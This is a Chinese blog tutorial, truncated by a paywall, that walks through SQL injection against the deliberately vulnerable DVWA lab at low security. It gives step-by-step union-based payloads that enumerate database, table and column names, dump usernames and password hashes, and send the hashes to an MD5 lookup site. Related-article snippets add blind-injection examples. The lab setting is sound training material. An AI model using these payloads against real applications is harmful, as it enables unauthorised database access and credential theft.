OWASP DVWA SQL注入与盲注low级别

已于 2022-01-19 18:45:41 修改
阅读量2k 收藏 2
点赞数
分类专栏: DVWA 文章标签: sql web安全 渗透测试
于 2022-01-12 18:15:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42906381/article/details/122459423
版权

DVWA

SQL Injection

测试目标网址: http://192.168.247.150/dvwa/vulnerabilities/sqli/

low安全级别

在这里插入图片描述

进行手工注入测试
1' or 1=1 #

1' or '1'='1' #

测试成功,构造payload,完成漏洞注入利用
在这里插入图片描述
猜解查询语句的字段数

1' or 1=1 order by 1 #

1' or 1=1 order by 2 #

在这里插入图片描述

获取当前数据库名称

1' union select 1,database() #

在这里插入图片描述

获取数据库中的表名

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

1' union select 1,table_name from information_schema.tables where table_schema='dvwa' #

在这里插入图片描述

获取表中的字段名

1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #

在这里插入图片描述

下载数据

1' or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

在这里插入图片描述

MD5解密得到密码

https://www.cmd5.com/

利用SQLmap进行注入

发现SQL注入点,进行注入测试

http://192.168.247.150/dvwa/v

最低0.47元/天 解锁文章
开着拖拉机卖茄子
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dvwa----sql盲注low
qq_45487671的博客
05-28 1129
实验4 SQL盲注 1.实验目的 (1)理解SQL盲注(布尔盲注、时间盲注、报错盲注)的原理; (2)学习手工盲注的过程; (3)了解SQL注入的防御技术。 2.实验要求 登陆DVWA平台,结合所学SQL盲注的基本知识,爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。关键位置截图。 3.实验过程描述 服务器端源代码 low级别,查看源代码,文本框提交为get请求方式,为佳任何输入过滤限制 同时SQL语句查询返回的结果只有两种, `User ID exists in
安全测试---SQL盲注实验
Qton_CSDN的博客
02-27 958
实验内容 1、安装好VMware软件并登入 2、进入界面,打开火狐浏览器,在地址输入localhost:81/dvwa/ 3、在左栏选择DVWA Security,将等级选为low 4、检测漏洞是否存在。 5、探测当前表的字段数,使用语句1’ order by 2 # 1' andleft(version(),1)=1 and '1'='1 1' andleft(...
owaspbwa-DVWA-SQL注入
baola的博客
08-09 1145
DVWA靶场的sql注入有三个难度等级,通过黑盒注入结合代码审计的形式做一下这个靶场
Web安全渗透OWASP-DVWA-SQL注入攻击
lx1315998513的博客
12-13 2671
SQL注入攻击 在owasp年度top10安全问题中,注入高居榜首,SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者索要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 一、回顾SQL语句 1.登陆owasp mysql -uroot -powaspbwa -u账户,-p密码...
SQL Injection (Blind)之盲注(原理、分类、利用)
weixin_51513059的博客
03-24 3522
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔的盲注(Boolean based)基于时间的盲注(Time based)
SQL 盲注 实验
m0_63645854的博客
04-10 408
通过手工 SQL 盲注分别完成 DVWALow,Medium,High 级别SQL 盲注实验。在文本框输入1' and 1=2#,不能正常访问数据,注入点为字符型。第一个字符为d,按照上一步的方法,逐个猜解出整个数据库名:dvwa。拦截数据包后,第一个数据包正常放行,修改第二个数据包,在。DVWA 的 Medium 级别SQL 盲注实验。按照上一步的方法,逐个猜解出整个数据库名:dvwa。按照上一步的方法,逐个猜解出整个数据库名:dvwa。(4)确认当前数据库名的第一个字符。
Hetian lab Day 9 DVWA二:SQL盲注
喵喵喵
08-07 164
文章目录实验背景 实验背景 盲注是不能通过直接显示的途径来获取数据库数据的方法。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。也就是说执行插入的语句后,不管是否执行,是否成功,都不会回显详细的错误信息,不像普通注入一样那么容易判断。但是,注入攻击还是发生了,只是错误信息被屏蔽掉了,请记住这个就好。一般情况下,盲注可分为三类: Booleanbase...
DVWA靶场,集成了owasp top 10漏洞
03-28
例如SQL注入、命令注入等。在DVWA中,你可以通过尝试构造恶意输入来学习如何利用这种漏洞。 2. A2:身份验证和会话管理(Broken Authentication and Session Management) - 当网站的登录、会话控制和用户身份验证...
利用SQL注入漏洞登录后台的实现方法
12-15
SQL注入是一种常见的网络安全威胁,它发生在web应用程序未能充分验证或过滤用户输入的数据时。当攻击者成功利用SQL注入漏洞,他们可以构造恶意的SQL语句,以操纵数据库查询,获取敏感信息,甚至完全控制服务器。以下...
SQL注入攻击与防御 第2版
03-10
SQL注入攻击与防御》第二版是一本深入探讨SQL注入问题的专业书籍,旨在帮助读者理解和防范这一常见的网络安全威胁。SQL注入是一种恶意攻击手段,通过在Web应用中输入构造的SQL语句来获取、修改、删除数据库中的...
ASP.NET防止SQL注入的方法示例
01-20
在ASP.NET开发中,SQL注入是一种常见的安全威胁,它允许攻击者通过输入恶意SQL语句来操纵数据库。本文将详细讲解如何使用实例方法防止ASP.NET中的SQL注入。 首先,了解SQL注入的基本概念。SQL注入是当应用程序直接...
防御SQL注入的方法总结
09-10
SQL注入是一种常见的网络安全威胁,它允许攻击者通过输入恶意的SQL代码来操纵数据库,获取、修改、删除敏感信息,甚至完全控制数据库系统。防御SQL注入是保护网站和应用程序免受此类攻击的关键步骤。 1. SQL注入的...
OWASP代码审计》学习——SQL注入漏洞审计
PICACHU+++的博客
08-04 564
注入攻击允许恶意用户向应用程序添加或注入内容和命令,以修改其行为。这些类型的攻击是常见且广泛的,黑客很容易测试网站是否易受攻击,攻击者也很容易利用这些攻击。如今,它们在尚未更新的遗留应用程序中非常常见。
Dvwa练习06 SQL注入Low
coco3105的博客
02-19 1144
等级low分别用了手工和sqlmap注入,medium没实践,high采用的是旧版本,没过滤参数。
DVWA靶场SQL注入low
qq_61975388的博客
08-17 579
DVWA靶场SQL注入实战
OWASPtop10大安全漏洞——sql注入
人间不值得的博客
10-07 204
SQL注入其实就是恶意用户通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码的过程。简单来说,就是数据「越俎代庖」做了代码才能干的事情。sql注入案例。
OWASP TOP 10-注入-SQL注入
最新发布
博客地址 www.sec0nd.top
10-17 331
SQL注入攻击指的是通过构造特殊的输入作为参数传入Web应用程序,改变原有的SQL语句的语义来执行攻击者所要的操作,其主要原因是程序没有采取必要的措施避免用户输入内容改变原有SQL语句的语义。如:if(length(database())>1,sleep(5),1)它的含义为,如果当前数据库名字符长度大于1,则执行sleep函数使数据库执行延迟,否则则返回1。1、找到SQl Injection 选项,测试是否存在注入点,这里用户交互的地方为表单,这也是常见的SQL注入漏洞存在的地方。
owasp top10 之 sql注入
weixin_48951041的博客
05-31 371
sql 注入:具体语句:查库名:select database();猜字段数:order by 3;暴库select group_concat(schema_name) from information_schema.schemata爆表select group_concat(table_name) from information_schema.tables where table_schema = database() %23爆字段select group_concat(column_name) fro
DVWAsql注入漏洞-low
m0_63735735的博客
07-19 1666
DVWAsql注入漏洞-low
OWASP_ZAP dvwa sql
09-12
OWASP ZAP是一款功能强大的开源安全测试工具,可用于发现和修复Web应用程序中的安全漏洞。它有一个强大的API,可以通过调用API来实现定制化编程,甚至可以开发自己的扫描器[1]。 如果你想在KALI上使用OWASP ZAP,你可以在官方网站上下载它。下载后,你可以按照指导安装和配置OWASP ZAP。完成安装后,你就可以开始使用OWASP ZAP进行安全测试了。 当涉及到SQL注入漏洞扫描时,OWASP ZAP提供了强大的功能。你可以使用OWASP ZAP对目标应用程序进行Fuzzer,以探测潜在的SQL注入漏洞。在OWASP ZAP的Fuzzer界面中,你可以查看Fuzzer的结果。如果结果数量较少,你可以直接通过观察来判断是否存在漏洞。如果结果数量较大,你可以通过点击字段名进行排序,从而更方便地查看结果。然而,有些情况下,比如302重定向,只能依靠经验进行判断,比如使用Ctrl+F来搜索关键词。 综上所述,通过使用OWASP ZAP的API和Fuzzer功能,你可以定制化编程和开发自己的扫描器,同时也可以使用OWASP ZAP来扫描和检测SQL注入漏洞。请根据你的需求和实际环境进行相应的配置和操作。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值